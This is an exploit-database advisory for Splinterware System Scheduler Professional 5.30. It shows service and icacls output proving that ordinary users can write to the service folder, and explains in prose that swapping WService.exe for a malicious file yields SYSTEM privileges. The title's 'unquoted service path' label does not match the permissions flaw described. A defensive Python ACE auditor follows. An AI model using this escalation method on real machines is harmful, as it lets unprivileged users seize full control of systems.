## https://sploitus.com/exploit?id=PACKETSTORM:162540
# Exploit Title: Splinterware System Scheduler Professional 5.30 - Unquoted Service Path  
# Date: 2021-05-11  
# Exploit Author: Andrea Intilangelo  
# Vendor Homepage: https://www.splinterware.com  
# Software Link: https://www.splinterware.com/download/ssproeval.exe  
# Version: 5.30 Professional  
# Tested on: Windows 10 Pro 20H2 x64  
  
System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions affecting  
the location from which the service 'WindowsScheduler' calls its executable. Because the service runs as Local  
System, a non-privileged user could execute arbitrary code with elevated privileges (system-level privileges as  
"nt authority\system"): if the WService.exe file located in the software's path is renamed and replaced with a  
malicious file, the new one will be executed after a short while.  
  
C:\Users\test>sc qc WindowsScheduler  
[SC] QueryServiceConfig OPERAZIONI RIUSCITE  
  
NOME_SERVIZIO: WindowsScheduler  
TIPO : 10 WIN32_OWN_PROCESS  
TIPO_AVVIO : 2 AUTO_START  
CONTROLLO_ERRORE : 0 IGNORE  
NOME_PERCORSO_BINARIO : C:\PROGRA~2\SYSTEM~1\WService.exe  
GRUPPO_ORDINE_CARICAMENTO :  
TAG : 0  
NOME_VISUALIZZATO : System Scheduler Service  
DIPENDENZE :  
SERVICE_START_NAME : LocalSystem  
  
C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\  
C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)  
BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)  
NT SERVICE\TrustedInstaller:(I)(F)  
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)  
NT AUTHORITY\SYSTEM:(I)(F)  
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)  
BUILTIN\Administrators:(I)(F)  
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)  
BUILTIN\Users:(I)(RX)  
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)  
CREATOR OWNER:(I)(OI)(CI)(IO)(F)  
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)  
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)  
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)  
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)  
  
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file  
  
C:\Users\test>
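
For auditing service directories, the following added example (not part of the original advisory) parses icacls output like the listing above and reports allow-ACEs that give non-administrative principals write access. The function name `risky_aces`, the `TRUSTED` allow-list and the `WRITE_RIGHTS` set are assumptions of this example.

```python
import re

# icacls rights that let a principal add, replace or re-permission files in a directory.
WRITE_RIGHTS = {"F", "M", "W", "GW", "GA", "WD", "AD", "DC", "WDAC", "WO"}
# Inheritance markers that icacls prints in the same parentheses syntax; not rights.
FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Assumption: only these principals are expected to hold write access.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\ADMINISTRATORS",
           "NT SERVICE\\TRUSTEDINSTALLER", "CREATOR OWNER"}
ACE = re.compile(r"^(?P<who>[^:]+):(?P<groups>(?:\([^)]*\))+)$")

def risky_aces(icacls_output, path):
    """Return (principal, write_rights) for each untrusted allow-ACE with write access."""
    findings = []
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.upper().startswith(path.upper()):
            line = line[len(path):].strip()  # the first ACE shares a line with the path
        m = ACE.match(line)
        if not m or m.group("who").strip().upper() in TRUSTED:
            continue
        tokens = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("groups")):
            tokens.update(t.strip() for t in group.split(","))
        hits = sorted((tokens - FLAGS) & WRITE_RIGHTS)
        if hits and "DENY" not in tokens:
            findings.append((m.group("who").strip(), hits))
    return findings

# Sample: lines copied from the icacls listing in the advisory above.
SERVICE_DIR = "C:\\PROGRA~2\\SYSTEM~1\\"
SAMPLE = r"""
C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)
BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
NT SERVICE\TrustedInstaller:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
"""

if __name__ == "__main__":
    for who, rights in risky_aces(SAMPLE, SERVICE_DIR):
        print(f"{who} holds write-capable rights {rights} on {SERVICE_DIR}")
```

On the listing above, the two explicit (non-inherited) `BUILTIN\Users` entries are the ones reported; the inherited `(I)(RX)` entries are not.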